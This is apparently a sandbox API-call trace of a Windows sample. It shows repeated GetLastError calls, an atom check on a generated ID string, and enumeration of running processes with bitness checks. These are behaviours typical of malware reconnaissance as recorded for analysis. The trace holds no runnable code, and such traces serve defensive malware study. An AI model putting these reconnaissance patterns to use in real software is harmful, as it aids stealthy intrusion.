	[0072.443] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0072.443] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0072.443] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0072.443] GetLastError () returned 0x5
	[0072.443] GetLastError () returned 0x5
	[0072.443] GetLastError () returned 0x5
	[0072.443] GetLastError () returned 0x5
	[0072.443] GetLastError () returned 0x5
	[0072.443] GetLastError () returned 0x5
	[0072.443] GetLastError () returned 0x5
	[0072.443] GetLastError () returned 0x5
	[0072.443] GetLastError () returned 0x5
	[0072.443] GetLastError () returned 0x5
	[0072.443] GetLastError () returned 0x5
	[0072.443] GetLastError () returned 0x5
	[0072.443] GetLastError () returned 0x5
	[0072.443] GetLastError () returned 0x5
	[0072.443] GetLastError () returned 0x5
	[0072.443] GetLastError () returned 0x5
	[0072.443] GetLastError () returned 0x5
	[0072.443] GetLastError () returned 0x5
	[0072.443] GetLastError () returned 0x5
	[0072.443] GetLastError () returned 0x5
	[0072.443] GetLastError () returned 0x5
	[0072.443] GetLastError () returned 0x5
	[0072.443] GetLastError () returned 0x5
	[0072.443] GetLastError () returned 0x5
	[0072.443] GetLastError () returned 0x5
	[0072.443] GetLastError () returned 0x5
	[0072.443] wsprintfA (in: param_1=0x770458, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0072.443] GetLastError () returned 0x5
	[0072.443] GetLastError () returned 0x5
	[0072.444] GetLastError () returned 0x5
	[0072.444] GetLastError () returned 0x5
	[0072.444] GetLastError () returned 0x5
	[0072.444] GetLastError () returned 0x5
	[0072.444] GetLastError () returned 0x5
	[0072.444] GetLastError () returned 0x5
	[0072.444] GetLastError () returned 0x5
	[0072.444] GetLastError () returned 0x5
	[0072.444] GetLastError () returned 0x5
	[0072.444] GetLastError () returned 0x5
	[0072.444] GetLastError () returned 0x5
	[0072.444] GetLastError () returned 0x5
	[0072.444] GetLastError () returned 0x5
	[0072.444] GetLastError () returned 0x5
	[0072.444] GetLastError () returned 0x5
	[0072.444] GetLastError () returned 0x5
	[0072.444] GetLastError () returned 0x5
	[0072.444] GetLastError () returned 0x5
	[0072.444] GetLastError () returned 0x5
	[0072.444] GetLastError () returned 0x5
	[0072.444] GetLastError () returned 0x5
	[0072.444] GetLastError () returned 0x5
	[0072.444] GetLastError () returned 0x5
	[0072.444] GetLastError () returned 0x5
	[0072.444] GetLastError () returned 0x5
	[0072.444] GetLastError () returned 0x5
	[0072.444] GetLastError () returned 0x5
	[0072.444] GetLastError () returned 0x5
	[0072.444] GetLastError () returned 0x5
	[0072.444] GetLastError () returned 0x5
	[0072.444] GetLastError () returned 0x5
	[0072.444] GetLastError () returned 0x5
	[0072.444] GetLastError () returned 0x5
	[0072.444] GetLastError () returned 0x5
	[0072.444] GetLastError () returned 0x5
	[0072.444] GetLastError () returned 0x5
	[0072.444] GetLastError () returned 0x5
	[0072.444] GetLastError () returned 0x5
	[0072.444] GetLastError () returned 0x5
	[0072.444] GetLastError () returned 0x5
	[0072.444] GetLastError () returned 0x5
	[0072.444] GetLastError () returned 0x5
	[0072.444] GetLastError () returned 0x5
	[0072.444] GetLastError () returned 0x5
	[0072.444] GetLastError () returned 0x5
	[0072.444] GetLastError () returned 0x5
	[0072.444] GetLastError () returned 0x5
	[0072.444] GetLastError () returned 0x5
	[0072.444] GetLastError () returned 0x5
	[0072.444] GetLastError () returned 0x5
	[0072.444] GetLastError () returned 0x5
	[0072.444] GetLastError () returned 0x5
	[0072.444] GetLastError () returned 0x5
	[0072.444] GetLastError () returned 0x5
	[0072.444] GetLastError () returned 0x5
	[0072.444] GetLastError () returned 0x5
	[0072.444] GetLastError () returned 0x5
	[0072.444] GetLastError () returned 0x5
	[0072.445] GetLastError () returned 0x5
	[0072.445] GetLastError () returned 0x5
	[0072.445] GetLastError () returned 0x5
	[0072.445] GetLastError () returned 0x5
	[0072.445] GetLastError () returned 0x5
	[0072.445] GetLastError () returned 0x5
	[0072.445] GetLastError () returned 0x5
	[0072.445] GetLastError () returned 0x5
	[0072.445] GetLastError () returned 0x5
	[0072.445] GetLastError () returned 0x5
	[0072.445] GetLastError () returned 0x5
	[0072.445] GetLastError () returned 0x5
	[0072.445] GetLastError () returned 0x5
	[0072.445] GetLastError () returned 0x5
	[0072.445] GetLastError () returned 0x5
	[0072.445] GetLastError () returned 0x5
	[0072.445] GetLastError () returned 0x5
	[0072.445] GetLastError () returned 0x5
	[0072.445] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0072.445] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0072.445] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0072.445] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0072.445] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0072.445] CloseHandle (hObject=0x224) returned 1
	[0072.445] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0072.445] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x772188, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0072.446] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0072.446] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.446] CloseHandle (hObject=0x224) returned 1
	[0072.446] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LocationNotificationWindows.exe", cchWideChar=31, lpMultiByteStr=0x72ea18, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocationNotificationWindows.exe", lpUsedDefaultChar=0x0) returned 31
	[0072.446] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0072.446] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.446] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0072.446] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.446] CloseHandle (hObject=0x224) returned 1
	[0072.446] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x772188, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0072.486] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x27eff10 | out: SystemInformation=0x0, ResultLength=0x27eff10*=0x16d68) returned 0xc0000004
	[0072.486] VirtualAlloc (lpAddress=0x0, dwSize=0x16e68, flAllocationType=0x3000, flProtect=0x4) returned 0x2bb0000
	[0072.487] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2bb0000, Length=0x16e68, ResultLength=0x0 | out: SystemInformation=0x2bb0000, ResultLength=0x0) returned 0x0
	[0072.488] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0072.488] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x772188, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0072.488] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0072.489] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x772170, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0072.489] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0072.489] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.489] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0072.489] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x772218, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0072.489] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0072.489] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x7721b8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0072.489] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0072.489] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x7721a0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0072.490] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0072.490] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x7721d0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0072.490] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0072.490] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.490] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0072.490] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.490] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0072.490] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x72dca0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0072.490] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0072.490] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.490] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0072.490] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.491] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0072.491] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.491] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0072.491] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.491] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0072.491] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.491] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0072.491] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.491] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0072.492] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.492] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0072.492] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.492] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0072.492] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.492] CloseHandle (hObject=0x224) returned 1
	[0072.492] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x772158, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0072.492] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0072.492] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.492] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0072.492] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x7287f8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0072.492] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0072.492] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.493] CloseHandle (hObject=0x224) returned 1
	[0072.493] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x728958, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0072.493] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0072.493] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.493] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0072.493] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.493] CloseHandle (hObject=0x224) returned 1
	[0072.493] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x7721b8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0072.493] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0072.493] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.493] CloseHandle (hObject=0x224) returned 1
	[0072.493] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x7721a0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0072.493] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0072.493] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.493] CloseHandle (hObject=0x224) returned 1
	[0072.494] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x772188, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0072.494] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0072.494] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.494] CloseHandle (hObject=0x224) returned 1
	[0072.494] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x7288b8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0072.494] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0072.494] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.494] CloseHandle (hObject=0x224) returned 1
	[0072.494] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x772200, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0072.494] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0072.494] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.494] CloseHandle (hObject=0x224) returned 1
	[0072.494] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x772170, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.494] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0072.494] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.494] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0072.494] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.494] CloseHandle (hObject=0x224) returned 1
	[0072.494] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x772218, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0072.495] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0072.495] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.495] CloseHandle (hObject=0x224) returned 1
	[0072.495] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.495] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0072.495] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.495] CloseHandle (hObject=0x224) returned 1
	[0072.495] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x7288f8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0072.495] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0072.495] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x772200, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0072.495] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0072.495] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.495] CloseHandle (hObject=0x224) returned 1
	[0072.495] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x728a38, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0072.495] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0072.495] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.495] CloseHandle (hObject=0x224) returned 1
	[0072.495] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x72dd60, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0072.495] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0072.495] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.496] CloseHandle (hObject=0x224) returned 1
	[0072.496] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x728a98, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0072.496] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0072.496] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.496] CloseHandle (hObject=0x224) returned 1
	[0072.496] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x72e720, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0072.496] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0072.496] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.496] CloseHandle (hObject=0x224) returned 1
	[0072.496] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x7287f8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0072.496] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0072.496] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.496] CloseHandle (hObject=0x224) returned 1
	[0072.496] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x772200, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0072.496] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0072.496] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.496] CloseHandle (hObject=0x224) returned 1
	[0072.496] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.496] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0072.496] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.497] CloseHandle (hObject=0x224) returned 1
	[0072.497] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x728a18, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0072.497] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
